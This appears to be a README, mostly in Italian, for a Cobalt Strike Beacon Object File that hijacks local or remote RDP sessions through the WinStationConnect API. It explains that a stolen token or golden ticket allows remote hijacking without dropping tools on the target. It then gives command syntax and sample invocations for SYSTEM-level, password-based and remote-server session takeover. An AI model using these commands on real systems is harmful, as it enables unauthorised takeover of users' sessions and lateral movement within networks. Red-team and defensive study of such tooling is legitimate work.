
Cobalt Strike Beacon Object File (BOF) che utilizza l'API WinStationConnect per eseguire il dirottamento di sessione RDP locale/remoto.
Cobalt Strike Beacon Object File (BOF) che utilizza l'API WinStationConnect per eseguire il dirottamento di sessioni RDP locali/remote. Con un token di accesso / ticket Kerberos valido (es. golden ticket) del proprietario della sessione, sarai in grado di dirottare la sessione in remoto senza rilasciare alcun beacon/strumento sul server di destinazione.
Per enumerare le sessioni localmente/remotamente, puoi usare Quser-BOF.

Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]
Command Description
-------- -----------
password Specifies the password of the user who owns the session to which you want to connect.
server Specifies the remote server that you want to perform RDP hijacking.
Sample usage
--------
Redirect session 2 to session 1 (require SYSTEM privilege):
bof-rdphijack 1 2
Redirect session 2 to session 1 with password of the user who owns the session 2 (require high integrity beacon):
bof-rdphijack 1 2 password P@ssw0rd123
Redirect session 2 to session 1 for a remote server (require token/ticket of the user who owns the session 2):
bof-rdphijack 1 2 server SQL01.lab.internal
make
tscon.exe